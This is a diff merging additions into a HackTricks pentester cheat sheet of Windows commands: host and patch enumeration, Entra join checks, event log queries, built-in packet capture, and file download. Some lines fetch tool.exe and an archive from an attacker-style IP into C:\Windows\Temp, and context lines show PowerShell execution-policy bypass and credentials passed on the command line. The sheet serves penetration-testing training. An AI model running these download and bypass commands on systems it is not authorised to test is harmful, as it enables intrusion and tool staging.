Merge pull request #2062 from HackTricks-wiki/research_update_src_windows-hardening_basic-cmd-for-pentesters_20260328_024230

Research Update Enhanced src/windows-hardening/basic-cmd-for...

Author: carlospolop

src/windows-hardening/basic-cmd-for-pentesters.md

@@ -15,6 +15,9 @@ wmic computersystem LIST full #Get PC info
 
 wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
 wmic qfe list brief #Updates
+where wmic 2>nul #WMIC is deprecated and may be absent on newer Windows 11 builds
+powershell -c "Get-CimInstance Win32_OperatingSystem | select Caption,Version,BuildNumber,OSArchitecture"
+powershell -c "Get-HotFix | select HotFixID,InstalledOn,Description"
 
 hostname
 
@@ -121,9 +124,27 @@ nltest /domain_trusts #Mapping of the trust relationships
 dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"
 ```
 
+### Entra ID / Hybrid Join
+
+Useful to quickly identify if the host is only AD-joined, Microsoft Entra joined, or hybrid joined, and whether the current user has a PRT cached for cloud SSO:
+
+```bash
+dsregcmd /status
+dsregcmd /status | findstr /i "AzureAdJoined EnterpriseJoined DomainJoined DeviceAuthStatus TenantName AzureAdPrt"
+```
+
 ### Logs & Events
 
 ```bash
+wevtutil el #List channels
+wevtutil gl Security #Configuration and size of a log
+wevtutil qe Security /rd:true /f:text /c:20
+wevtutil qe Microsoft-Windows-PowerShell/Operational /rd:true /f:text /c:20
+wevtutil qe Microsoft-Windows-Sysmon/Operational /rd:true /f:text /c:20
+wevtutil qe Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational /rd:true /f:text /c:20
+wevtutil qe Microsoft-Windows-Windows Defender/Operational /rd:true /f:text /c:20
+wevtutil epl Security C:\Temp\Security.evtx
+
 #Make a security query using another credentials
 wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321
 ```
@@ -296,8 +317,30 @@ ipconfig /all
 arp -A
 ```
 
+### Packet capture without third-party tools
+
+```bash
+pktmon filter remove
+pktmon filter add -p 445 #Capture SMB only
+pktmon start --capture --pkt-size 0 --file-name C:\Windows\Temp\pktmon.etl
+pktmon stop
+pktmon etl2pcap C:\Windows\Temp\pktmon.etl --out C:\Windows\Temp\pktmon.pcapng
+
+netsh trace show interfaces
+netsh trace start capture=yes tracefile=C:\Windows\Temp\nettrace.etl maxsize=256 filemode=circular
+netsh trace stop
+```
+
 ## Download
 
+Curl.exe
+
+```bash
+curl.exe -k -L "https://10.10.14.13/tool.exe" -o C:\Windows\Temp\tool.exe
+curl.exe -k -L "https://10.10.14.13/archive.zip" -o C:\Windows\Temp\archive.zip
+tar -xf C:\Windows\Temp\archive.zip -C C:\Windows\Temp\
+```
+
 Bitsadmin.exe
 
 ```
@@ -464,6 +507,11 @@ powershell -ep bypass - < c:\temp:ttt
 ```
 
 
+## References
+
+- [Microsoft Learn - Troubleshoot devices by using the `dsregcmd` command](https://learn.microsoft.com/en-us/entra/identity/devices/troubleshoot-device-dsregcmd)
+- [Microsoft Learn - Packet Monitor (`pktmon`)](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/pktmon)
+
 {{#include ../banners/hacktricks-training.md}}